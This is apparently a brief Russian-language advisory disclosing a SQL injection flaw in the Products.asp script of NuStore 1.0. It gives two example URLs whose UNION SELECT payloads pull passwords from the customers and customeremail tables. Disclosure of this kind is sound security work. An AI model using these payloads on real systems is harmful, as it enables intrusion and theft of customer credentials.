Программа: NuStore 1.0
Уязвимость позволяет злоумышленнику выполнить произвольный SQL код в базе данных приложения. Уязвимость существует из-за ошибки в обработке входных данных сценарием Products.asp.
Примеры:
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200, 0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200, 0,pass,0%20from%20customeremail%20where%20no=0
